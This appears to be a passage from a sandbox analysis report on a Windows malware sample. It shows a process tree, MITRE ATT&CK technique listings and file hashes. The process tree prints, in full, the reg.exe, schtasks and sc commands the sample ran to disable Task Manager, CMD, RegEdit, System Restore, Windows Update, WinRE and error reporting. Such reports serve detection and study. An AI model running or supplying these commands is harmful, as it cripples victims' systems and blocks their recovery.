C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsSetupOptions" /t REG_DWORD /d 1 /f6⤵
- System Location Discovery: System Language Discovery
PID:3000
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f6⤵
- System Location Discovery: System Language Discovery
PID:1020
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AutoRestartShell" /t REG_DWORD /d 0 /f6⤵
- System Location Discovery: System Language Discovery
PID:1804
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f6⤵
- System Location Discovery: System Language Discovery
PID:4544
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f6⤵
- System Location Discovery: System Language Discovery
PID:4480
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f6⤵
- System Location Discovery: System Language Discovery
PID:964
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d 2 /f6⤵
- System Location Discovery: System Language Discovery
PID:5040
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f6⤵
- Disables RegEdit via registry modification
- System Location Discovery: System Language Discovery
PID:3940
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v "fAllowToGetHelp" /t REG_DWORD /d 0 /f6⤵
- System Location Discovery: System Language Discovery
PID:4416
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting" /v "Disabled" /t REG_DWORD /d 1 /f6⤵
- System Location Discovery: System Language Discovery
PID:2148
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowCPL" /t REG_DWORD /d 1 /f6⤵
- System Location Discovery: System Language Discovery
PID:4080
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoThemesTab" /t REG_DWORD /d 1 /f6⤵
- System Location Discovery: System Language Discovery
PID:4036
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoDispSettings" /t REG_DWORD /d 1 /f6⤵
- System Location Discovery: System Language Discovery
PID:1196
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsUpdate" /t REG_DWORD /d 1 /f6⤵
- System Location Discovery: System Language Discovery
PID:4200
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsUpdate" /t REG_DWORD /d 1 /f6⤵
- System Location Discovery: System Language Discovery
PID:2172
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Control\MiniNT" /v "NoWinRE" /t REG_DWORD /d 1 /f6⤵
- System Location Discovery: System Language Discovery
PID:4448
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d 2 /f6⤵
- System Location Discovery: System Language Discovery
PID:4708
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\WinRE" /v "DisableStatusMessages" /t REG_DWORD /d 1 /f6⤵
- System Location Discovery: System Language Discovery
PID:3016
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute" /v "AutoChk" /t REG_MULTI_SZ /d "" /f6⤵
- System Location Discovery: System Language Discovery
PID:816
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f6⤵
- System Location Discovery: System Language Discovery
PID:1648
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "\Microsoft\Windows\WinRE\WinREBootIndex" /Disable6⤵
- System Location Discovery: System Language Discovery
PID:4700
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "\Microsoft\Windows\WinRE\WinRECleanup" /Disable6⤵
- System Location Discovery: System Language Discovery
PID:3656
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Services\sr" /v "Start" /t REG_DWORD /d 4 /f6⤵
- System Location Discovery: System Language Discovery
PID:4424
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Control\CrashControl" /v "AutoReboot" /t REG_DWORD /d 0 /f6⤵
- System Location Discovery: System Language Discovery
PID:3772
-
-
C:\Windows\SysWOW64\sc.exesc config wercplsupport start=disabled6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4560
-
-
C:\Windows\SysWOW64\sc.exesc config WerSvc start=disabled6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:64
-
-
-
-
-
-
C:\Users\Admin\Uni.exeC:\Users\Admin\Uni.exe1⤵
- Executes dropped EXE
PID:4724
-
C:\Users\Admin\Uni.exeC:\Users\Admin\Uni.exe1⤵
- Executes dropped EXE
PID:4040
-
C:\Users\Admin\Uni.exeC:\Users\Admin\Uni.exe1⤵
- Executes dropped EXE
PID:3104
-
C:\Users\Admin\Uni.exeC:\Users\Admin\Uni.exe1⤵
- Executes dropped EXE
PID:4280
-
C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exeC:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe -Embedding1⤵PID:4568
-
C:\Users\Admin\Uni.exeC:\Users\Admin\Uni.exe1⤵
- Executes dropped EXE
PID:532
-
C:\Users\Admin\Uni.exeC:\Users\Admin\Uni.exe1⤵
- Executes dropped EXE
PID:2832
-
C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exeC:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe -Embedding1⤵PID:3140
-
C:\Users\Admin\Uni.exeC:\Users\Admin\Uni.exe1⤵
- Executes dropped EXE
PID:3428
-
C:\Users\Admin\Uni.exeC:\Users\Admin\Uni.exe1⤵
- Executes dropped EXE
PID:2096
-
C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exeC:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe -Embedding1⤵PID:5104
-
C:\Users\Admin\Uni.exeC:\Users\Admin\Uni.exe1⤵
- Executes dropped EXE
PID:4420
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
BITS Jobs
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
BITS Jobs
1Deobfuscate/Decode Files or Information
1Modify Registry
2Obfuscated Files or Information
1Command Obfuscation
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
654B
MD516c5fce5f7230eea11598ec11ed42862
SHA175392d4824706090f5e8907eee1059349c927600
SHA25687ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151
SHA512153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc
-
Filesize
3KB
MD556efdb5a0f10b5eece165de4f8c9d799
SHA1fa5de7ca343b018c3bfeab692545eb544c244e16
SHA2566c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
SHA51291e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc
-
Filesize
1KB
MD5de68ca68ee303dfddbd9454fa0936cc9
SHA198e6c9050a451a86bf92abe4180cc67d2aea5819
SHA256104a212eae1936ca7621842115c62bdfc2e69d67d19d3bdbdac91209a67f5272
SHA51219de3dd8d3abca2388f563aa519aca32df4eeeb4ae0ed4d13979da4f8f019fd3e000f7f1e54214423fd82358c23f1d74b238540902a52cfc0046b5ffa84feedb
-
Filesize
1KB
MD5ae79f9644a1cb6c2536b818e32c2a2ef
SHA1f2f11f31c742f37c57021d9f758bf01d0f4cd827
SHA256fd223703c5342d45b55338ca56af0f1ca7c06b9128c9e20d9777bcbbde43dd0d
SHA5122c373f393a0813f2400db4aa3f365bd448c1ce877f5c36b5ffc3d9e7e8d59315f0ae025a6057125d2cb1eeedc15aaeb0fe6772bab32cb46232362af5d1a5b34e
-
Filesize
1KB
MD574f05ed3358c5a90314fc3f2de8edbbb
SHA1a83797f4b6d98240dbf3154dd1fdd9fd8f299a14
SHA256e15317e9b6c7b084a44146b2bf4a501af327f0f3b2894451afc8db4c52855093
SHA5125158d6b1e910a230c207ba9f5184d72867092b07fe9807cdc1c5b4e34ee21b971911419e2e6ab4ee39f47afa714e9a6b2bb7467fc3ac509279ed0fb72e2a4fa9
-
Filesize
1KB
MD5da91425d0490a65f6e9317a1e831bdd2
SHA146886dde43736432786516865dc7c2536398ea11
SHA2566e8bb649646ea0d2c9acf771dc32b365c08eb26b4f5bf88b003726ca3940a379
SHA512abc0776b5c1885b9cda6b5ba5fa500afecc229309502c851e8db89c4aacd892acd7f9b08933a03e8b9bbfc3f1dfd477d53c25bf631015c2a43fa64804485efec
-
Filesize
1KB
MD59ff10ce90fa1f5a4e14683fade00fb08
SHA1200b762060211bfda71bd56157a50b20bf7aa842
SHA256fc9dc034c4b550190df44882e548b24ec1a6f5a4bc92b88869b377f3ffc03185
SHA512ef628c6b0f6fd67b3ba0684585df407716f8e03f29a9c1b72eee7615d1c315e1c832fe4095b1fa0e4690df0a02b6c331b0a3b5d6099cdcd8291ab1fdd7f19cc2
-
Filesize
90KB
MD5011e90b162cf67f34f91d6d563859817
SHA130ce18995be9545ae88189bc3ff5defbd2392d11
SHA2566cced62e6af36a52c48fdf0efb1571a44d6469f4ca66ca510020e5da407ed613
SHA51251d47a852b27540154c8b3ccb295dae4874475bf631be931bf8a4cf271805e927162c7f01e8df7f0aea8b9a860dac3500e59208cb60440bfa8e827325be7a36d
-
Filesize
217KB
MD51d62aa3d19462f3d5575fc54159911b4
SHA1b37eab86c0075245fcc517a280f0705f6dffb852
SHA2566acaae0fb470790102a338e23dfe2263f31e529288e4efe51b34bca30371cb36
SHA51278a9501d7920920577a586396e5d9e2278a7c926448c9a98d7844db9032dbd887df90d2f389fe1754bf5a2071a19dfd5d40315624923e903ef9ef6cbb214b1df
-
Filesize
41KB
MD509e870076cfaa16f20be5050834ba8ff
SHA10b8b26cdaf08a07b8e86b1643ca23e249c8f3840
SHA256f3fcb094f57ddd9e4c29eccc62e3ad3ce50d40230fbe0f00324ccf18acd68bc4
SHA512d655030bf9bb84ecdd7109aab55c33976e2a2cbd63ccece48d3e881b1dd378e4e17f157a3dd9a07e8786650cbf46b8d742a115cb9906c9b69d7143c2b4de0643
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
225KB
MD52841cd968c72817f9eef3a4bc2293d6e
SHA15b788259d501493a87f00deee64fa0943ab19e34
SHA256e5a9784f523a6965622532199a42f696ca15557b473f84c12f18210085a20e95
SHA51282eded2b67775763669452be98f7c5eeb0a3cd34f4947753fef9cedea4a1f56b49223ed7ad8e68b77e54ab2bf004e9ba22107afdc23e2e168dc60f2013907bf0
-
Filesize
3KB
MD5ecde221cbc92ee55ae5b8c1a24e98f56
SHA1ebda0dba4abcd3bf93183e2787cc9e5f9f1448ee
SHA256b6fbab33e31d0a525d4c752886d812c1c46477f6314da7bde25bdc8198cb70cb
SHA512122673ad96f1e407c75a93672f6538f342499f4e14221cbe4103c601362667487f3f33800230572e255b55e691e5068adce6336a4ffe1a651bff465d2c2d3493
-
Filesize
85KB
MD5fad3aaf3015914e834a9d0313fcd371b
SHA1a4715a153a79263436819905b87b54acae4b2227
SHA256917674ca36b5345dccd41f4ce772c6ffe8c3054520ebd2923fba768cbee77690
SHA51264c9bd116ad70abf9e8bf444f248915383d4b4680de1f6dadad649e0279803c9575952b0e1995a34e47c5a73eb42e23e964437a4a7828d3214f3f694383db83a